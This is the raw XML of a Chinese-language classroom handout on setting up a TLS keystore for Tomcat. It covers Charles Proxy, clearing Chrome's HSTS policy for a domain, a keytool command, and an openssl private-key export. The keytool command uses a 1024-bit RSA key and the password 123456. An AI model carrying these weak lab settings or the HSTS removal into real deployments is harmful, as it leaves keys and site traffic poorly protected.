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6DFA" w14:textId="615DC713" w:rsidR="0098676C" w:rsidRPr="00DC0584" w:rsidRDefault="00EE33CF" w:rsidP="00EE33CF">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC0584">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>2023-10 段維瀚老師</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="350FEDB0" w14:textId="20ED39E3" w:rsidR="00EF3D39" w:rsidRPr="006534B5" w:rsidRDefault="00EF3D39" w:rsidP="00EF3D39">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006534B5">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>網站自行加入金鑰</w:t>
      </w:r>
      <w:r w:rsidR="006733E1" w:rsidRPr="006534B5">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>步驟</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50A1FA25" w14:textId="2F679D72" w:rsidR="0098676C" w:rsidRPr="00DC0584" w:rsidRDefault="007247F3" w:rsidP="00E508DE">
      <w:pPr>
        <w:pStyle w:val="3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t>一、安裝工具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4B26B4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2096" w14:textId="36AE785D" w:rsidR="0098676C" w:rsidRPr="00DC0584" w:rsidRDefault="00DE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 w:hint="eastAsia"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="007247F3" w:rsidRPr="00DC0584">
              <w:rPr>
                <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:cs="Arial Unicode MS"/>
              </w:rPr>
              <w:t>. 監控 HTTP 封包資料</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4AD3EBDD" w14:textId="77777777" w:rsidR="0098676C" w:rsidRPr="00DC0584" w:rsidRDefault="00384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hyperlink r:id="rId8">
              <w:r w:rsidR="007247F3" w:rsidRPr="00DC0584">
                <w:rPr>
                  <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體"/>
                  <w:color w:val="1155CC"/>
                  <w:u w:val="single"/>
                </w:rPr>
                <w:t>https://www.charlesproxy.com/download/</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="3F0C612A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</w:p>
          <w:p w14:paraId="58F866F7" w14:textId="326F92A0" w:rsidR="0098676C" w:rsidRPr="00DC0584" w:rsidRDefault="00DE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 w:hint="eastAsia"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidR="007247F3" w:rsidRPr="00DC0584">
              <w:rPr>
                <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:cs="Arial Unicode MS"/>
              </w:rPr>
              <w:t>. Chrome 解決 http 自動跳轉 https 問題</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4C930259" w14:textId="0ED40E0A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地址欄輸入：</w:t>
            </w:r>
            <w:hyperlink r:id="rId9" w:anchor="hsts" w:history="1">
              <w:r w:rsidRPr="00194F08">
                <w:rPr>
                  <w:rStyle w:val="aff2"/>
                  <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:cs="Arial Unicode MS"/>
                  <w:b/>
                  <w:bCs/>
                </w:rPr>
                <w:t>chrome://net-internals/#hsts</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="3ECDEA65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找到底部 Delete domain security policies一欄，輸入想處理的域名，點擊delete</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7CA60B44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  <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="347674C1" wp14:editId="3F69DAAB">
                  <wp:extent cx="5591175" cy="977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2CE3A9" w14:textId="77777777" w:rsidR="0098676C" w:rsidRPr="00DC0584" w:rsidRDefault="0098676C" w:rsidP="00DE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</w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="228BC958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67B801C5" w14:textId="77777777" w:rsidR="0098676C" w:rsidRPr="00DC0584" w:rsidRDefault="007247F3" w:rsidP="00E508DE">
      <w:pPr>
        <w:pStyle w:val="3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/>
        </w:rPr>
        <w:t>二、</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC0584">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Github code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BDC076D" w14:textId="033F25E5" w:rsidR="0098676C" w:rsidRDefault="00C20076">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId11" w:history="1">
        <w:r w:rsidRPr="00C20076">
          <w:rPr>
            <w:rStyle w:val="aff2"/>
            <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>https://github.com/vincenttuan/JavaSecurity2023</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="471B32DC" w14:textId="77777777" w:rsidR="00C20076" w:rsidRPr="00DC0584" w:rsidRDefault="00C20076">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75D87C52" w14:textId="77777777" w:rsidR="00AB56F1" w:rsidRPr="00EF3D39" w:rsidRDefault="00AB56F1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體"/>
          <w:color w:val="434343"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EF3D39">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="039B4C7E" w14:textId="1DCDA8FC" w:rsidR="0098676C" w:rsidRPr="00DC0584" w:rsidRDefault="007247F3" w:rsidP="00E508DE">
      <w:pPr>
        <w:pStyle w:val="3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lastRenderedPageBreak/>
        <w:t>三、生成金鑰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70344E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0F95" w14:textId="73E0FD2C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在指定目錄下建立 tomcat.</w:t>
            </w:r>
            <w:r w:rsidR="00A93F7E" w:rsidRPr="00DC0584">
              <w:rPr>
                <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:cs="Arial Unicode MS" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>pkcs12</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3273BCD8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指定目錄</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1D206BA9" w14:textId="26B373A1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在</w:t>
            </w:r>
            <w:r w:rsidR="00FF3E63" w:rsidRPr="00DC0584">
              <w:rPr>
                <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:cs="Arial Unicode MS" w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> eclipse &gt; servers &gt; T</w:t>
            </w:r>
            <w:r w:rsidRPr="00DC0584">
              <w:rPr>
                <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:cs="Arial Unicode MS"/>
              </w:rPr>
              <w:t>omcat</w:t>
            </w:r>
            <w:r w:rsidR="00FF3E63" w:rsidRPr="00DC0584">
              <w:rPr>
                <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:cs="Arial Unicode MS" w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00DC0584">
              <w:rPr>
                <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:cs="Arial Unicode MS"/>
              </w:rPr>
              <w:t>目錄下建立 /keys 資料夾</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3F7DABE0" w14:textId="6E17C87E" w:rsidR="0098676C" w:rsidRPr="00DC0584" w:rsidRDefault="00FF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1737DB1" wp14:editId="2C089DAE">
                  <wp:extent cx="3314700" cy="1955800"/>
                  <wp:effectExtent l="12700" t="12700" r="12700" b="12700"/>
                  <wp:docPr id="4" name="圖片 4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文字, 螢幕擷取畫面, 字型 的圖片&#10;&#10;自動產生的描述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95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7766F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DOS 命令提示字元進入到  …/keys 目錄</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="11C753CC" w14:textId="1E1D414F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 w:cs="Arial Unicode MS"/>
              </w:rPr>
              <w:t>建立</w:t>
            </w:r>
            <w:r w:rsidRPr="00DC0584">
              <w:rPr>
                <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:cs="Arial Unicode MS"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 w:cs="Arial Unicode MS"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>tomcat.</w:t>
            </w:r>
            <w:r w:rsidR="00622913" w:rsidRPr="00DC0584">
              <w:rPr>
                <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:cs="Arial Unicode MS" w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>pkcs12</w:t>
            </w:r>
            <w:r w:rsidRPr="00DC0584">
              <w:rPr>
                <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:cs="Arial Unicode MS"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 w:cs="Arial Unicode MS"/>
              </w:rPr>
              <w:t>指令</w:t>
            </w:r>
            <w:r w:rsidR="00775348" w:rsidRPr="00DC0584">
              <w:rPr>
                <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:cs="Arial Unicode MS" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>（密碼：</w:t>
            </w:r>
            <w:r w:rsidR="00775348" w:rsidRPr="00DC0584">
              <w:rPr>
                <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:cs="Arial Unicode MS"/>
                <w:color w:val="00B050"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="00775348" w:rsidRPr="00DC0584">
              <w:rPr>
                <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:cs="Arial Unicode MS" w:hint="eastAsia"/>
                <w:color w:val="00B050"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>23456</w:t>
            </w:r>
            <w:r w:rsidR="00775348" w:rsidRPr="00DC0584">
              <w:rPr>
                <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:cs="Arial Unicode MS" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>）</w:t>
            </w:r>
            <w:r w:rsidRPr="00DC0584">
              <w:rPr>
                <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:cs="Arial Unicode MS"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="72E03124" w14:textId="55AEECC1" w:rsidR="0098676C" w:rsidRPr="00DC0584" w:rsidRDefault="00C7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color w:val="0000FF"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">keytool -genkeypair -alias tomcat -keyalg RSA -keypass </w:t>
            </w:r>
            <w:r w:rsidRPr="00DC0584">
              <w:rPr>
                <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="00B050"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>123456</w:t>
            </w:r>
            <w:r w:rsidRPr="00DC0584">
              <w:rPr>
                <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="0000FF"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> -storepass </w:t>
            </w:r>
            <w:r w:rsidRPr="00DC0584">
              <w:rPr>
                <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="00B050"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>123456</w:t>
            </w:r>
            <w:r w:rsidRPr="00DC0584">
              <w:rPr>
                <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="0000FF"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> -keysize 1024 -validity 365 -keystore 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tomcat.pkcs12</w:t>
            </w:r>
            <w:r w:rsidRPr="00DC0584">
              <w:rPr>
                <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="0000FF"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> -storetype pkcs12</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1DCA2D30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</w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2ECEDA96" w14:textId="15058756" w:rsidR="00744E6D" w:rsidRPr="00DC0584" w:rsidRDefault="00744E6D" w:rsidP="00744E6D">
      <w:pPr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lang w:val="en-US"/>
        </w:rPr>
        <w:t>PKCS12（Public Key Cryptography Standards #12）是一種用於存儲多個密鑰和憑證在單一檔案中的格式。這裡有幾點原因為什麼 PKCS12 被認為是業界標準格式：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E13927B" w14:textId="1025BE1E" w:rsidR="00744E6D" w:rsidRPr="00DC0584" w:rsidRDefault="00744E6D" w:rsidP="002268A8">
      <w:pPr>
        <w:pStyle w:val="afb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:leftChars="0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b/>
          <w:bCs/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>多平台兼容性：</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC0584">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:hint="eastAsia"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>PKCS12 格式被設計為跨多個系統和平台。這意味著您可以在一個平台上生成的 PKCS12 檔案並將它匯入到另一個平台，而不會遇到任何問題。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47169EB5" w14:textId="12FB5081" w:rsidR="00744E6D" w:rsidRPr="00DC0584" w:rsidRDefault="00744E6D" w:rsidP="002268A8">
      <w:pPr>
        <w:pStyle w:val="afb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:leftChars="0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b/>
          <w:bCs/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>集中存儲：</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC0584">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:hint="eastAsia"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>PKCS12 允許您在一個檔案中存儲私鑰、公鑰、憑證和其他相關的資訊。這使得管理和分發這些資訊變得更加簡單和集中。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C85C1B6" w14:textId="4E4C22E7" w:rsidR="00744E6D" w:rsidRPr="00DC0584" w:rsidRDefault="00744E6D" w:rsidP="002268A8">
      <w:pPr>
        <w:pStyle w:val="afb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:leftChars="0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b/>
          <w:bCs/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>密碼保護：</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC0584">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:hint="eastAsia"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>PKCS12 檔案可以使用密碼進行保護，確保只有擁有正確密碼的人可以訪問和使用其中的資訊。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FDAC072" w14:textId="59E3E10B" w:rsidR="00744E6D" w:rsidRPr="00DC0584" w:rsidRDefault="00744E6D" w:rsidP="002268A8">
      <w:pPr>
        <w:pStyle w:val="afb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:leftChars="0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b/>
          <w:bCs/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>廣泛的支援：</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC0584">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:hint="eastAsia"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>許多工具、應用程式和平台都內建支援 PKCS12 格式。這意味著導入、匯出、使用 PKCS12 檔案在大多數環境中都是相對直接和無縫的。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="479551EF" w14:textId="163D36C5" w:rsidR="00744E6D" w:rsidRPr="00DC0584" w:rsidRDefault="00744E6D" w:rsidP="002268A8">
      <w:pPr>
        <w:pStyle w:val="afb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:leftChars="0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lang w:val="en-US"/>
        </w:rPr>
        <w:t>安全性：PKCS12 提供了一個安全的方式來存儲和傳輸密鑰和憑證。它支援多種加密算法，以確保存儲的資料安全。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21BBEEB6" w14:textId="46751724" w:rsidR="0098676C" w:rsidRPr="00DC0584" w:rsidRDefault="00744E6D" w:rsidP="00744E6D">
      <w:pPr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hint="eastAsia"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>由於這些優勢，PKCS12 已經成為在業界裡廣泛使用和推薦的格式，尤其當涉及到交換或存儲私鑰和憑證時。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36A3D16F" w14:textId="2AC8E75B" w:rsidR="00622913" w:rsidRPr="00DC0584" w:rsidRDefault="00622913">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28C48658" w14:textId="5F7DE80F" w:rsidR="00007D86" w:rsidRPr="00DC0584" w:rsidRDefault="00007D86" w:rsidP="00007D86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lastRenderedPageBreak/>
        <w:t>在"PKCS12"中的"#12"表示這是"Public Key Cryptography Standards"系列中的第12項。PKCS是一系列由RSA Data Security, Inc.（現在稱為RSA Security）開發的標準，旨在促進公鑰加密技術的廣泛應用。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78606319" w14:textId="21318B1F" w:rsidR="00007D86" w:rsidRPr="00DC0584" w:rsidRDefault="00007D86" w:rsidP="00007D86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這些標準涵蓋了各種加密技術和相關協議的方面，包括私鑰加密、憑證生成、加密消息語法等。PKCS12是該系列中的第12項，專門用於描述將個人的公鑰、私鑰、憑證和其他相關資訊存儲在一個加密的檔案中的格式和實現方法。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04B2EC6C" w14:textId="77777777" w:rsidR="00A34BBD" w:rsidRPr="00DC0584" w:rsidRDefault="00A34BBD" w:rsidP="00007D86">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07D82A29" w14:textId="3C756271" w:rsidR="00A34BBD" w:rsidRPr="00DC0584" w:rsidRDefault="00A34BBD" w:rsidP="00A34BBD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-keypass 和 -storepass 是用於設定金鑰和儲存庫的密碼的參數。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13F66317" w14:textId="77777777" w:rsidR="00F9597E" w:rsidRPr="00DC0584" w:rsidRDefault="00A34BBD" w:rsidP="00FD0A65">
      <w:pPr>
        <w:pStyle w:val="afb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:ind w:leftChars="0"/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-keypass：此密碼用於</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC0584">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:hint="eastAsia"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>保護私鑰</w:t>
      </w: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的。當您嘗試使用私鑰（例如進行數字簽名或解密操作）時，系統會要求您提供此密碼</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42073D56" w14:textId="3E2E5EC4" w:rsidR="00007D86" w:rsidRPr="00DC0584" w:rsidRDefault="00A34BBD" w:rsidP="00FD0A65">
      <w:pPr>
        <w:pStyle w:val="afb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:ind w:leftChars="0"/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-storepass：此密碼用於</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC0584">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:hint="eastAsia"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>保護整個keystore</w:t>
      </w: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的。當您嘗試訪問keystore（例如添加新的憑證或私鑰、列出keystore的內容等）時，系統會要求您提供此密碼。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2138BEFE" w14:textId="70993079" w:rsidR="00A34BBD" w:rsidRPr="00DC0584" w:rsidRDefault="00A34BBD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="324700E0" w14:textId="42651C3B" w:rsidR="008B0A64" w:rsidRPr="00DC0584" w:rsidRDefault="008B0A64" w:rsidP="008B0A64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keytool -genkeypair 命令會產生一對私鑰（private key）和公鑰（public key）。但在這個命令的上下文中，這對金鑰是儲存於同一個檔案中，即 tomcat.pkcs12。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FE594A2" w14:textId="68F96358" w:rsidR="008B0A64" w:rsidRPr="00DC0584" w:rsidRDefault="008B0A64" w:rsidP="008B0A64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DC0584">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:hint="eastAsia"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>在 PKCS12 格式的 keystore 中，私鑰和與其相關的公開憑證鏈（包含公鑰）都存儲在同一個檔案中。因此，當您看到 tomcat.pkcs12 這樣的檔案時，它裡面已經包含了私鑰和公鑰。這是PKCS12格式的特點，它設計來同時保存私鑰和相關的憑證鏈。</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="aff1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9"/>
      </w:tblGrid>
      <w:tr w:rsidR="001E5367" w:rsidRPr="00DC0584" w14:paraId="7528B390" w14:textId="77777777" w:rsidTr="001E5367">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9019" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="000000" w:themeFill="text1"/>
          </w:tcPr>
          <w:p w14:paraId="3B744131" w14:textId="0349B4FA" w:rsidR="00DE7421" w:rsidRPr="00DC0584" w:rsidRDefault="00DE7421" w:rsidP="001E5367">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pP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>利用</w:t>
            </w:r>
            <w:r w:rsidRPr="00DC0584">
              <w:rPr>
                <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"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>openssl 取出私鑰範例：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="53529918" w14:textId="64696C7F" w:rsidR="001E5367" w:rsidRPr="00DC0584" w:rsidRDefault="001E5367" w:rsidP="001E5367">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體"/>
                <w:color w:val="FFFF00"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC0584">
              <w:rPr>
                <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體"/>
                <w:color w:val="FFFF00"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">openssl pkcs12 -in </w:t>
            </w:r>
            <w:r w:rsidRPr="00DC0584">
              <w:rPr>
                <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體"/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>tomcat.pkcs12</w:t>
            </w:r>
            <w:r w:rsidRPr="00DC0584">
              <w:rPr>
                <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體"/>
                <w:color w:val="FFFF00"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> -nocerts -out </w:t>
            </w:r>
            <w:r w:rsidRPr="00DC0584">
              <w:rPr>
                <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體"/>
                <w:color w:val="FF23EC"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>privatekey.pem</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="22C81798" w14:textId="77777777" w:rsidR="001E5367" w:rsidRPr="00DC0584" w:rsidRDefault="001E5367" w:rsidP="001E5367">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pP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>Enter Import Password: 輸入原始密碼例如：123456</w:t>
            </w:r>
          </w:p>
